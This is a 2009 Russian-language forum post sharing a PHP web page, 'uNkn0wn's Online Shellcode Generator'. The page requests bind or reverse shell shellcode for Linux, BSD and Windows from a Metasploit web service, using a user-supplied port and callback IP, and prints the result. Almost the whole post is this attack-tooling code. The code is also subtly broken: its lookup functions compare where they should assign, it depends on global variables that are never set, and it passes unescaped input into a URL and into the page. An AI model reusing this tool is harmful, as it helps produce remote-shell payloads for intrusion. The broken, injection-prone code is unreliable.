Тема: Полезные скрипты
Показать сообщение отдельно

  #5  
Старый 20.03.2009, 00:15
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию
Shellcode Generator [uNk r.]

Код:
<html>
<body>
<style>

body {
    background-color: #2b2b2b;
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #B0B0B0;
}

.shellcode {
   font-size:10pt;
   color:   #FFF;
   font-weight:normal;
}

.border
{
border: 1px solid #006699;
background-color:#000000;
}
.header
{
background-color:#000000;
}
.content-background
{
background-color:#000000;
}
.text-strong
{
font-weight:bold;
}
.content-border
{
border: 1px solid #006699;
background-color:#1A1A1A;
}
.content-background
{
background-color:#000000;
}
a:link {
    color: #006699;
}
a:visited {
    color: #006699;
}
a:hover {
    color: #CCCCCC;
}
a:active {
    color: #CCCCCC;
}
textarea
{
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #006699;
    background-color:#161616;
    border: #006699 1px solid;
}
input
{
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #006699;
    background-color:#161616;
    border: #006699 1px solid;
    }
    select
    {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #006699;
    background-color:#161616;
    border: #006699 1px solid;
    }
</style>
<?PHP
if(isset($_POST['port'])){


function input_match($source, $num, $preg, $preg1)
{
$parts = explode($preg, $source);
   $parts = explode($preg1, $parts[$num]);
      $var = $parts[0];
return $parts[0];
}

function browse($url)
{
$ch = curl_init();
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
   curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
      $store = curl_exec ($ch);
return $store;
}
function glob_match_bind_shell($os)
{
   if($os == 'linux_ia32_bind')
   {
      $glob == "GLOB(0x2b4a01c2fef0)";
   }else
      if($os == 'bsd_ia32_bind')
      {
      $glob == "GLOB(0x2b4a01c208a0)";
      }else
         if($os == 'win32_bind')
         {
            $glob == "GLOB(0x2b4a01c41e90)";
         }
return $glob;         
}

function glob_match_rev_shell($os)
{
   if($os == 'linux_ia32_reverse')
   {
      $glob == "GLOB(0x2b4a01c41fb0)";
   }else
      if($os == 'bsd_ia32_reverse')
      {
      $glob == "GLOB(0x2b4a01c41d30)";
      }else
         if($os == 'win32_reverse')
         {
            $glob == "GLOB(0x2b4a01b95800)";
         }
return $glob;         
}

function bind_shell($port, $os)
{
   $glob = glob_match_bind_shell($os);
      $input = browse("http://metasploit.com:55555/PAYLOADS?parent=$glob&MODULE=$os&MODE=GENERATE&OPT_LPORT=".$port."&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload");
      $size = input_match($input, 1, "Size=", " ");
      $output = input_match($input, 1, "*/", "#");
      $type = ucwords(str_replace("_"," ",$os));
      echo "<table width='100%' cellspacing=0 border=0 cellpadding=0>
      <br><pre>
      <div class=shellcode>/* <br> Affix Presents... <br> uNkn0wn's Online Shell Code Generator <br> Port = $port <br> Size = $size <br> Type = $type <br> */ $output </div></table>";
}

function reverse_shell($host, $port, $os)
{
$glob = glob_match_rev_shell($os);
   $input = browse("http://metasploit.com:55555/PAYLOADS?parent=$glob&MODULE=$os&MODE=GENERATE&OPT_EXITFUNC=seh&OPT_LHOST=$host&OPT_LPORT=$port&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload");
   $size = input_match($input, 1, "Size=", " ");
   $output = input_match($input, 1, "*/", "#");
   $type = ucwords(str_replace("_"," ",$os));
   echo "<table width='100%' cellspacing=0 border=0 cellpadding=0>
      <br><pre>
      <div class=shellcode>/* <br> Affix Presents... <br> uNkn0wn's Online Shell Code Generator <br> Port = $port <br> Size = $size <br> Type = $type <br> */ $output </div></table>";

}

if(!eregi("_bind", $os))
   {
   echo reverse_shell($host, $port, $os);
      }else{
      echo bind_shell($port, $os);
      }

}else{
echo '<center>
<table width="33%" height="90" border="0" cellpadding="3" cellspacing="1" class="content-border" id="table3">
<tr>
<td class="content-background">
<div align="center"><center><font face="Trebuchet MS" size=3>
   <b>uNkn0wn.ws Online Shellcode Generator!<br />
      Affix</b>
</font>
</center>
<br>
<font face="Trebuchet MS" size=2 color=#006699>
<hr>
<form method="POST" action="'.$_SERVER['PHP_SELF'].'">
<table width="100%" cellspacing=0 border=0 cellpadding=0>
Shell Code:  <select name="os">
      <option value="linux_ia32_bind">Linux IA32 Bind Shell</option>
      <option value="linux_ia32_reverse">Linux IA32 Reverse Shell</option>
      <option value="bsd_ia32_bind">BSD IA32 Bind</option>
      <option value="bsd_ia32_reverse">BSD IA32 Reverse</option>
      <option value="win32_bind">Windows[32] Bind</option>
      <option value="win32_reverse">Windows[32] Reverse</option>
      </select></table>
<table width="100%" cellspacing=0 border=0 cellpadding=0>
Port: <input type="text" name="port" value="8080"></table>
<table width="100%" cellspacing=0 border=0 cellpadding=0>
Reverse IP: <input type="text" name="host" value='.$_SERVER['REMOTE_ADDR'].'></table>
<table width="100%" cellspacing=0 border=0 cellpadding=0>
<input type="submit" name="submit" value="Generate Shell Code!">
</table>';
$port = $_REQUEST['port'];
$host = $_REQUEST['host'];
$os     = $_REQUEST['os'];
}
?>
</body>
</html>
 
Ответить с цитированием